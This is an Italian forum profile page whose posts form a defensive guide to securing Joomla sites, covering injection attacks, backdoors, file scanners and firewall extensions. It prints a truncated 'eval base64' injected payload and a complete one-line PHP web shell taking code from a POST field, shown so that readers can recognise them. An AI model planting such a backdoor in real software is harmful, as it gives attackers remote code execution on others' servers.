alex

Members
  • Content Count

    11,420
  • Joined

  • Last visited

  • Days Won

    1

alex last won the day on January 22 2015

alex had the most liked content!

About alex

  • Rank
    ce vole er core

core_pfieldgroups_99

  • Nome
    Alex
  • Città
    Roma
  • Interessi
    mi piace tutto
  • Lavoro
    so fare male molte cose
  • Mac che possiedo
    PB Alu 15"

Contact Methods

  • AIM
    hektor63
  1. OSE Security Suite (link) Open Source Excellence è un'altra azienda molto attiva nella produzione di software dedicato a Joomla, ma il suo prodotto più maturo è questa "Security Suite" di protezione. Il prezzo è di 90 sterline (attenti al cambio!) e copre tutti gli aggiornamenti e l'assistenza per un anno. La Suite è utilizzabile senza limiti di tempo e senza limiti sul numero di installazioni. OSE propone anche una singola estensione, di nome Anti-Hacker, che si installa all'interno del nostro sito, mentre la "Security Suite" è una seconda installazione Joomla che lavora in parallelo al sito. Il vantaggio è quello di avere un mini-sito che è un fortino pronto a difenderci al meglio, perchè è stato ridotto all'essenziale ed è meno vulnerabile. Questo significa che il nostro hosting provider deve darci la possibilità di avere almeno due database, quindi sarà bene informarsi prima di comprare lo spazio. Il pacchetto comprende un anti-virus col quale all'inizio faremo la scansione di tutti i nostri file. Poi metteremo in atto tutta una serie di suggerimenti per la messa in sicurezza, tutte operazioni che ormai vi sono note. Infine si dovrà configurare il firewall vero e proprio. OSE Security Suite lavora su tre livelli (li chiamano "Layer") di protezione che non sono dipendenti l'uno dall'altro. Il primo è quello fondamentale ed è sempre attivo, il terzo è il meno importante ed è collegato ad una blacklist di IP che ho già citato in precedenza, Honey pot. Il secondo Layer è quello più delicato. Questa protezione tiene sotto controllo tutto il funzionamento del sito, compreso lo stesso backend di Joomla, per cui interpreta come comportamenti "maliziosi" anche azioni semplici come caricare un'immagine dentro un articolo. Nella versione 2 della suite era un bel problema, perchè si veniva bannati all'istante dal proprio sito Per togliere il ban bisogna entrare in phpMyAdmin ed è veramente una noia. Sempre nella vecchia versione, il Layer II si poteva regolare su 10 livelli, ma per trovare il livello adeguato si doveva procedere per via empirica ogni volta che si usava una nuova estensione. Nell'attuale versione 3 hanno introdotto una regolazione molto fine del Layer II, ma non c'è documentazione. Quindi, o siete già esperti sull'argomento oppure attivate tutto alla cieca. Il vantaggio della versione 3 è che la reazione di difesa può essere impostata dalla semplice negazione dell'azione sospetta fino al ban dell'IP, per cui all'inizio si può fare prove senza essere "auto-bannati". L'assistenza, mesi fa, mi disse che in realtà il Layer II non dovrebbe essere vitale per la protezione del sito, perché sostanzialmente protegge dagli spam bot. Non ho approfondito. A mio parere, conviene tenere il Layer II disattivato nei periodi in cui si lavora molto sul sito. Questo può essere un problema soprattutto se ci sono molti utenti estranei all'amministrazione del firewall, che quindi devono sempre chiedere il "permesso" prima di mettersi all'opera. Si può utilizzare una whitelist specifica per l'utilizzo di moduli e estensioni, ma è un lavoro certosino e dopo un po' uno lascia perdere. L'alternativa sarebbe quella di inserire una whitelist di numeri IP, ma è una via praticabile solo per chi ha gli IP fissi. Dopo un anno d'uso sono molto soddisfatto di OSE Security Suite e ho deciso di rinnovare l'abbonamento. Questo è tutto, spero che vi siate fatti un'idea sufficientemente ampia sulla gestione della sicurezza. Segnalo infine un articolo molto interessante: How to prevent your website from getting hacked. Repair damaged site.
  2. Sempre a proposito di Installazione, in seguito i più esperti apprezzeranno Akeeba, che si rivela utile non solo per ripristinare le copie di backup. 1- Si trasferiscono sul server sia il file zip di Joomla che la piccola utility Akeeba Kickstart 2- Si apre il browser e si digita l'URL www.nomesito.ext/kickstart.php 3- Appare l'interfaccia dell'installer di Akeeba, che è molto intuitivo e ricalca quello standard di Joomla. Il gioco è fatto.
  3. La cartella Installation va cancellata quando è terminata tutta l'operazione di Installazione, non subito dopo il trasferimento dei file, altrimenti non installi niente. Forse intendevi dire di cancellarla in locale, ma scritto così è fuorviante. Comunque consiglio di usare un altra procedura più rapida: 1- copiare tutto lo zip via FTP 2- aprire il cPanel e entrare nel FileManager (phpMyAdmin avrà qualcosa di simile), e da lì scompattare lo zip Qui c'è un breve tutorial: cPanel File Manager Tutorial Tempo totale 1 minuto.
  4. Cap 6 - Il muro di fuoco. Il Firewall è lo strumento principale a nostra disposizione per bloccare la violazione di un sito. Tutto quello che blocca o devia l'aggressione può essere considerato una difesa attiva. Anche il captcha, nel suo piccolo, lo è... Marco's Interceptor I meno esperti e più frettolosi possono iniziare dall'ottimo plugin di Marco Leoni: Marco's SQL Injection protection - LFI interceptor (consiglierei umilmente di trovare un nome un po' più masticabile). Come recita il sito: "Questo plugin aggiunge una semplice ma, nella maggior parte dei casi, fondamentale protezione contro gli attacchi di SQL injection e LFI (local file intrusion). Verifica i dati inviati a Joomla e intercetta tanti tipi di violazioni (exploits), salvando il vostro sito dagli hackers. Attiva i rapporti via posta elettronica e preparati ad essere terrorizzato!" Correttamente, Marco Leoni vi avvisa che: "... questo plugin intercetta tanti exploit di tipo comune, NON TUTTI! Dovrebbe essere inteso come un aiuto, esso non è "LA SOLUZIONE" Chiaro, no? Si installa in due secondi e si configura in un minuto. Funziona e non interferisce con le estensioni più diffuse. Cosa si può volere di più? Risposta ovvia: un Lucano e un Firewall. Come al solito, vi rammento che questo non è un corso completo e non vuole essere una review completa di tutto lo scibile umano sulla sicurezza di Joomla. Questo è un punto di partenza, poi sta a voi continuare la ricerca. Ho vagliato diverse soluzioni e alla fine mi sono concentrato sulle due che vi sto per illustrare. Esse infatti, mi sono sembrate le migliori dal punto di vista qualità /prezzo, e quindi le ho sperimentate. RSFirewall (link) RSJoomla è una società molto attiva nella produzione di estensioni per Joomla, e copre tanti e svariati campi di utilizzo del nostro amato CMS. RSFirewall costa un centinaio di euro, cifra con la quale ci garantiamo assistenza e aggiornamenti per un anno. Si può usare senza limiti di tempo e su un numero illimitato di siti, ma per ciasun sito bisogna prima procurarsi un codice nella propria area utenti di RSJoomla. E' un po' seccante ma poi gli aggiornamenti si fanno in due secondi. Si installa come una qualunque estensione e ci si lavora da subito. Il primo passo consiste nel fare una sorta di scansione del sito ("configuration check"), dopo la quale il programma assegna un punteggio, in centesimi, alla sicurezza del sito e propone una serie di operazioni da compiere per migliorarla. Quindi aspettiamoci di modificare i permessi di file e dir, se colpevolmente non l'ho abbiamo già fatto, di modificare il file php.ini, il secondo grande baluardo dopo .htaccess, e, per es., attivare le restrizioni open_basedir. Aborro l'open_basedir e quindi in merito non vi dirò una sola parola. Sappiate che esiste. Purtroppo questa operazione di scansione si rivela spesso frustrante, perchè si interrompe a metà e genera un messaggio di errore. L'assistenza mi ha risposto prontamente, suggerendomi di modificare alcuni parametri oppure di cancellare e reinstallare l'estensione intera. Niente da fare, la soluzione non ce l'ho. Questo problema viene fuori all'improvviso e, sempre secondo l'assistenza, dipende dalla configurazione del server, sulla quale io ovviamente non posso mettere becco. Fra un porcone e l'altro si va avanti, come sempre nella vita, e si procede alla configurazione di tutto il resto. Non entrerò nel dettaglio, ma voglio darvi un'idea generale di questo software. RSFirewall ovviamente protegge dagli attacchi esterni, ma la sua peculiarità consiste in tutta una serie di configurazioni certosine sulle restrizioni riguardanti utenti e componenti, ed è in grado di bloccare completamente nuove installazioni ("lock site"). Può piacere a chi gestisce siti con molte utenze e teme che i più inesperti possano combinare guai. Complessivamente RSFirewall è un buon software ma non mi soddisfa del tutto e attualmente lo tengo solo su pochi siti senza aggiornarlo. Oltre al già citato problema con il check del sito, non riesco ad avere un buon feeling d'uso e spesso mi sono trovato in difficltà . Reputo migliore l'approccio e l'usabilità della suite di Open-Source Excellence, della quale parlerò nel prossimo ultimo capitolo.
  5. E' un problema che hanno in molti. Ho fatto una breve ricerca. Qui un tizio dice di avere risolto: https://www.vbulletin.com/forum/showthread.php/395525-The-forum-redirect-to-tinyurl4-info
  6. Cap 5 - Perchè la difesa attiva: bannari è megghiu ri futtiri Siamo arrivati al dunque. Finora abbiamo tamponato i danni e cercato di prevenirli, ma si può fare di più: bloccare l'azione e bannare l'IP dal quale proviene l'attacco. A parte il sottile delirio di onnipotenza che potrebbe corrompere la nostra anima, il ban dell'IP riceve altre due critiche principali: 1) è inutile perchè gli IP sono dinamici e cambiano continuamente 2) è potenzialmente dannoso perchè se l'IP è condiviso poi banniamo anche "clienti" innocenti Se guardo indietro alle statistiche dei miei siti, però, vedo che gli hacker praticamente agiscono durante campagne di un paio di settimane e usano una trentina di IP al massimo. Poi passano mesi interi senza che succeda niente, e all'improvviso arriva un'altra ondata di attacchi da una serie nuova di IP. Gli IP dai quali provengono gli attacchi, alla fine, fanno quasi sempre parte di una lunga lista di soliti noti, basta andare a controllare sui portali che si dedicano a raccogliere queste informazioni, per es. il Project Honey Pot Inoltre, i server che ospitano questi hacker stanno per lo più in Russia, Brasile, Germania... talvolta Francia e UK. Avete una clientela internazionale globale? Beati voi! Comunque sia, se temete di perdere contatti preziosi, potete optare per ban temporanei o limitarvi a bloccare l'azione senza usare il ban. Inolre, in seguito al ban compare una pagina di avviso sulla quale potete lasciare l'email del webmaster. Insomma, ci sono vari livelli di difesa che si possono considerare. Penso che ognuno, giunto a questo punto, si possa formare la propria opinione in merito e agire di conseguenza. Per come la vedo io, fino a che un IP mi attacca, non lo voglio fra i piedi, e un server che ospita questo tipo di azioni dubito che mi possa portare veri clienti. Per questo uso un Firewall.
  7. Cap 4 - Il sito è compromesso: perchè ce l'hanno con me? Si passa facilmente dallo stato di grazia "a me non succederà mai" al delirio di persecuzione "qualcuno mi ha preso di mira". Un "fatal error" può capitare, per distrazione o per caso, quindi ci bucano il sito e si entra in un labirinto dal quale apparentemente non c'è via d'uscita. Perchè, come dicevo, spesso restano dei buchi di sicurezza e tutti i nostri sforzi vengono vanificati nel giro di uno o due giorni. Ma nessuno ce l'ha con noi in particolare. Gli hacker mandano in giro per la rete dei bot che attaccano migliaia di IP al giorno, e poi sui loro portali si bullano mostrando l'elenco degli URL violati. Perchè gli hacker si divertono così? Perchè i babbuini hanno il deretano colorato? Ci sono tante domande che meriterebbero una risposta ma non ce l'hanno, a noi basti sapere che questi sono attacchi, per così dire, standard e non mirati. La premessa è doverosa, in quanto le difese che adottiamo sono anch'esse standard e sono efficaci in questo contesto. E' quasi certo che un bravo hacker, se ci si mettesse di punta, sarebbe in grado di violare i nostri siti protetti con mezzi e metodi standard. Ma perchè un bravo hacker dovrebbe avercela con noi? Consideriamo alcune possibilità : a) Gestiamo un sito istituzionale, governativo, molto famoso o cose del genere b) Ci stiamo bombando la moglie/ragazza di un bravo hacker c) Un bravo hacker si sta bombando la nostra moglie/ragazza e vuol tenerci occupati d) Il nostro cane abitualmente fa la cacca nel giardino di/davanti al portone di un bravo hacker e) Un bravo hacker ci ha incontrato per strada e si è ricordato di quando gli fregavamo le merendine alle elementari Ecco, se non rientrate in nessuna di queste cinque grandi categorie, potete stare abbastaqnza certi che gli attacchi che subite sono generalizzati e nessuno ce l'ha con voi. Quindi è il momento di passare alla difesa attiva...
  8. La difesa passiva si può implementare anche con altri strumenti e metodi. a) Si può modificare il file .htaccess, che è il primo baluardo di difesa del nostro sito. Segnalo quindi il prezioso Bodvoc' Blog b) Per i più paranoici, fra i quali annovero me stesso, esiste la possibilità di criptare la password di login del pannello di amministrazione e di tutti gli altri moduli presenti sl sito: Encryption Component c) Si devono sempre controllare i permessi di file e dir! Le nuove installazioni di vari plugin e componenti, spesso lasciano permessi un po' troppo larghi se non addirittura pericolosi. Per controllare e modificare i permessi di file e dir, rivolgersi ancora a Bodvoc, che ha scritto Site Scan. d) Infine, in caso di attacco, dopo la pulizia bisogna sempre prendersi la briga di cambiare le password, sia di Joomla che del pannello di amministrazione del sito (CPanel o quel che è). Se ripristinate il sito da un backup sicuro, quando c'è, create un nuovo database SQL, con username e password nuovi. La prima parte è conclusa. Ci sono ancora altre vie che si potrebbero seguire. Questo è il mio approccio che può essere utile come base di partenza, poi ognuno seguirà le sue preferenze man mano che approfondirà gli argomenti. Ricordiamoci però, che se si installa sul sito la prima roba che capita fra le mani e se si tralasciano gli aggiornamenti di sicurezza, non c'è metodo che tenga. Vale la pena ricordare cosa scrive Marco Leoni, lo "conosceremo" prossimamente, sulla sua pagina: Anyway remember that security it is a 'forma mentis', not a plugin!
  9. Cap 3 - Difesa passiva Ordunque, abbiamo subito un classico attacco di tipo PHP injection ma non solo, abbiamo il sospetto che sul nostro sito siano stati copiati dei file maligni. Ma un sito di Joomla, come minimo, conta circa seimila file, come si verifica quali file sono cambiati e come si fa a trovare quelli nuovi? Semplice, si usa Eyesite. Questo componente fa una scansione di tutti i file del sito, a intervalli di tempo regolari, e poi manda un avviso con l'elenco delle modifiche che ha rilevato. I file modificati sono preceduti dal testo CHANGED, mentre quelli nuovi da NEW. Eyesite è imprescindibile come lo è Akeeba. La scansione si può fare direttamente dal pannello di controllo di Joomla, ma ovviamente è meglio farla in automatico impostando un cronjob. Non tutti gli hosting provider mettono a disposizione la funzionalità del cronjob, fate attenzione a questo aspetto. Il controllo mediante Eyesite è importantissimo, lo ripeto, perchè se sono stati creati nuovi file maligni sul sito e non ce ne accorgiamo, poi ce li portiamo dietro in tutti i backup successivi. Il risultato sarà che il nostro sito verrà di nuovo violato nel giro di 24-48 ore. Provare per credere.
  10. OK, cominciamo dalla sicurezza, poi se vengono fuori altre necessità ci metto becco. La sicurezza in Joomla è un problema che esiste, se sia un problema grave o meno dipende, in parte, anche da noi e dall'attenzione che dedichiamo a questo aspetto. Leggerete spesso che molti programmatori di Joomla affermano che non servono firewall o altre protezioni particolari, ma basta "usare codice scritto bene e tenere aggiornato Joomla e le estensioni". Beh... non sono d'accordo. Punto. Fine del dibattito. Cap 1 - L'attacco L'attacco più frequente è il famigerato codice "eval base64", che in genere dirotta le ricerche di Google su dei siti privi di interesse, tipo p3p0.com Se a un certo punto vedete crollare drammaticamente a zero gli accessi da Google, molto probabilmente hanno iniettato il codice dentro ai vostri file. Qualunque file può essere infettato, dal php.ini e configuration.php fino ai più semplici. Il codice viene inserito all'inizio del file e appare così: <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS91c2Vycy93ZWIvYjk2OS9pc ... una ventina di righe così e alla fine... sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319 fQ==')); ?> Ci sono decine di studi dedicati a questo codice, ma ripeto, nella maggior parte dei casi si prende la briga di dirottare i click che da Google dovrebbero arrivare sul vostro sito. Non è per niente bello. Cap 2 - La porta aperta Nel caso più fortunato, troverete infetti solo i file principali della Home directory. Nel caso peggiore, saranno lasciati sul vostro sito delle backdoor, porte aperte per gli attacchi successivi. Se non ve ne siete accorti quando avete fatto il backup, allora ripristinare il sito non farà altro che lasciare immutato il buco nella rete. Si tratta di file dal nome innocuo, tipo post.php o image.php, che si mimetizzano bene, oppure si chiamano con nomi scemi tipo fuck.php, e dunque facilmente identificabili. Ma trovateli in mezzo a seimila file e più. Il contenuto del file è questo: <?php eval (base64_decode($_POST["php"])); ?> Non è un codice maligno in se, quindi nessun antivirus ve lo troverà mai. Bisogna andare a pescarli uno per uno: molto difficile, a meno che... TO BE CONTINED
  11. Olééééé, il mio account funziona! Ero stato depistato da una seconda richiesta di password. Gran lavorone Faxus, complimenti. Fammi sapere quando è richiesto il mio intervento. Intanto volevo dire a Matteo che la OzioGallery la userei con molta attenzione perché dà parecchi problemi di sicurezza. La Phoca invece non mi è mai piaciuta, è proprio questione di pelle. Prova Art Sexy Lightbox, Art Sexy Lightbox - Joomla! Extensions Directory Diciamo che, in generale, un'estensione buona per tutte le stagioni non c'è, consiglio sempre di provarne almeno 3 o 4.
  12. Ha ragione Gennaro. Se esiste una tecnologia di largo uso, tu mica mi puoi vendere un oggetto che la ignora e mettermi a disagio. Apple ricasca in errori antichi... (Accolgo con gioia immensa la rinnovata veste del forum di Macity)
  13. Quando apri il file non usare il doppio click sull'icona. Vai in archivio/apri, poi nella finestra di dialogo, in basso, c'è "codifica testo", scegli "occidentale (windows latino)".
  14. Con joomla puoi fare e disfare il tuo sito con qualunque "fesseria" ti venga in mente di inserire. Ci vuoi il sondaggio? C'è. Vuoi la fotogalleria strafiga fatta con flash? Ce ne sono quante ne vuoi. Ci vuoi il modulo di iscrizione, rss feed, carrello elettronico? Pronti! Fra le migliaia di template gratuiti ne trovi di sicuro uno che ti aggrada e lo puoi modificare un minimo secondo il tuo gusto. E' chiaro che ci vuole qualche tempo per imparare, dipende da quanto ti ci dedichi ogni giorno, e che bisogna avere un po' di pazienza per star dietro agli aggiornamenti e ai piccoli problemi che posson venir fuori. Con Joomla si possono gestire siti molto complessi, in sostanza. Nel tuo caso, devi solo decidere se il gioco vale la candela, perchè con iWeb te la puoi sbrigare in una settimana,